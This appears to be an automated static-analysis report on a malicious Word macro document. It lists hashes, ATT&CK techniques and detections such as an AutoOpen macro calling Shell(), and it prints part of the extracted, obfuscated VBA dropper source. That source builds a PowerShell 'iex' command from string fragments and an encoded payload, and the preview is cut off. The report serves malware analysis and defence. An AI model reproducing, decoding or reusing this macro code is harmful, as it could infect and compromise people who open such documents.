Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fcbe9f4e5a8cbb6f…

MALICIOUS

Office (OLE)

220.5 KB Created: 2018-06-26 18:52:00 Authoring application: Microsoft Office Word First seen: 2018-11-05
MD5: c4796308953017c9dc69d340689e8efe SHA-1: 754bbba270998733bec18a69b64e2c27cc17b7f1 SHA-256: fcbe9f4e5a8cbb6f74e4408d871ace98282ffc840245abeae3e158cc034cd094
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is configured to execute, and it utilizes the Shell() function, indicating an attempt to run arbitrary commands. This behavior is consistent with a macro-based dropper designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592509-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592509-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8688 bytes
SHA-256: 1bf305c451ad53ba3cbaf3e62dab123ce06d443b1df5873271306c6db9912ec8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PDUztJJrVsWOE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WbjwawIAYnKT"
Function JpdbaC()
On Error Resume Next
hbHka = 82372
CdhrX = wMLhc
hNWDbD = Sin(48669)
fjtiq = 13895
ciWJjv = 21002
wzidTb = CDate(23054)
PVmTubwZr = "Hell ." + Chr(40) + " " + "$s" + "HEllId[1" + "]" + Chr(43) + "$sh" + "EL" + "liD[13"
odAMIs = 20756
Trrfaf = wwMpO
zwqJOD = Sin(22552)
bCwMr = 46572
wNfAWS = 64540
YwDcAh = CDate(31728)
bPkoOJWbU = "]" + Chr(43) + "'x'" + Chr(41) + Chr(40) + Chr(40) + " '12" + "2-26}" + "41P3" + "6P9" + "9P48P5" + "9_41>" + "115}4" + "9H60_52_"
NNOwBl = 8423
hhYtv = CDate(80783)
NNWiLi = MmRzO
EklRPo = 17906
jfLtr = Sin(92711)
hkOzBn = 18642
siWiaOcJiVU = "59P61" + "H42P126-" + "16>5" + "9e42e1" + "12G" + "9>59t6" + "0_" + "29_" + "50_55P" + "59P4" + "8%4" + "2_101H"
jiCfIc = 57272
tPwjQ = CDate(44415)
lwvIfd = jKruJ
mnUGI = 68992
juVih = Sin(50232)
krvOz = 83258
zhscXT = "122" + "e23" + ">13e52G9" + "9t121e54" + "%42_4" + "2P46-10" + "0-11" + "3t113t4"
VXrMi = 68610
doAGwN = CDate(34582)
uhZAsZ = uBjIoc
loNMiA = 86693
ANCBj = 76010
sNTDDl = Sin(25199)
OqmoKh = "1%41e" + "41H112}" + "58_63e" + "42}63t60" + "%63t" + "45" + "-59t11" + "2%" + "36_" + "115"
uKDzPS = 61914
AuUIE = CDate(88666)
nEWMCI = vMQITp
ZpYsjY = 66865
cuwOZp = 77356
EDYVQ = Sin(97309)
npbPEUz = "e56}50>" + "49H" + "49" + "-44P55" + "G48>57" + "}1" + "12G" + "61>49"
wOPiz = 23568
zJFXo = CDate(4723)
FPPtKM = FtNPr
EvUTb = 51431
FwkrUI = 80462
FMXzX = Sin(59911)
wFuQzAL = "_51" + "H1" + "13-53}1" + "05_110-4" + "1G11" + "3e3" + "0>54t42G" + "42" + "P46"
mOwmY = 62809
zzEpN = CDate(77390)
PYthR = rzltzH
sWPrM = 79275
obvpCV = 679
nUozq = Sin(8823)
YORNQHnoaS = "G100%1" + "13-113" + ">42}" + "54%59G6" + "1G42}44H" + "50}" + "108P10" + "6t112" + "t61-49" + ">51" + "H113"
JpdbaC = PVmTubwZr + bPkoOJWbU + siWiaOcJiVU + zhscXT + OqmoKh + npbPEUz + wFuQzAL + YORNQHnoaS
vXLBw = 1892
ipqGK = CDate(21916)
Efzqjt = AbHJk
DiwwH = 5652
JUdqu = 76675
ctTwd = Sin(86134)
End Function
Function OJBjCmhc()
On Error Resume Next
FqzrPz = 98891
NlGLBV = CDate(90558)
YjjrmA = Tvrfso
HKjsM = 40517
wXzjcO = 5421
VWmzw = Sin(41255)
LjIUaon = "e57t" + "52P" + "17" + "%2" + "5}41t113" + "P30P" + "54H42}" + "42>46H10" + "0%113G"
lATTKa = 35483
QJCwbk = CDate(68240)
kBhoS = lAWBiF
VtuplU = 95665
iSzpP = 73488
SJjcV = Sin(72679)
UtZYOzwjL = "113P63" + "e51G4" + "6P50P63P" + "52H56}" + "11" + "2H61>" + "49H" + "51" + "H112e6" + "0H44" + "G113G" + "10"
fiYWJC = 82099
onQnj = CDate(4026)
EvoFw = NVIPT
EswcEj = 16370
TQUul = 45966
CpjjA = Sin(19619)
iwsjuOiNKP = "9_7" + "e44e4t1" + "13" + "H30t5" + "4t42}42" + "_46t1"
oowZc = 82098
WDHhk = CDate(33548)
PKdtcV = RvwKN
Timau = 74682
tjHJfR = 39532
rOAXZj = Sin(28767)
dHnNz = "00e113-" + "11" + "3P54" + "t39" + "}58t44>4" + "9G58t49" + "-51G112" + "t4" + "9H"
jSMCs = 36108
SmuVPw = CDate(15155)
UikiKz = OEQlff
uYlhD = 87013
UrYoW = 51566
EAnUO = Sin(87221)
doIHdYhfrR = "44" + "%57H113" + "e9%63H58" + "-7}103H2" + "7%113e" + "30}54t42" + "%42H4" + "6}100P" + "11" + "3_113-" + "41t41t"
rLnuEj = 52693
AjHICO = CDate(34014)
HThllP = cRjGJ
cRRmJ = 54885
rvEmTZ = 35809
zGzum = Sin(24173)
AMbquZU = "41t112" + "-61G3" + "9}61t50t" + "59e115" + ">56>55e5" + "0P5" + "1}112H6" + "1G49" + "-5" + "1}113" + "P102P10%" + "56_10"
iBZXZG = 7844
zFQjUt = CDate(52329)
zJzjww = njCoHi
jMXrw = 33064
jswvP = 57075
GnMnK = Sin(13413)
QjSkr = "e1" + "0P22-113" + "-121}11" + "2P13G46>" + "50%5" + "5-42" + "H118H1" + "21>" + "30-121}1" + "19}101-1"
bMwrC = 91068
saIljZ = CDate(94255)
ETMCVI = IWpbk
ObTUDq = 29077
OHmuC = 61218
QmMBW = Sin(59865)
OMGEIk = "22}41" + "e12" + "G20%" + "126%99" + "G126}" + "121_111%" + "102"
LSJpUh = 34557
pFVGl = CDate(20986)
qLQJd = QLSNM
kdaOvi = 67327
usIArm = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.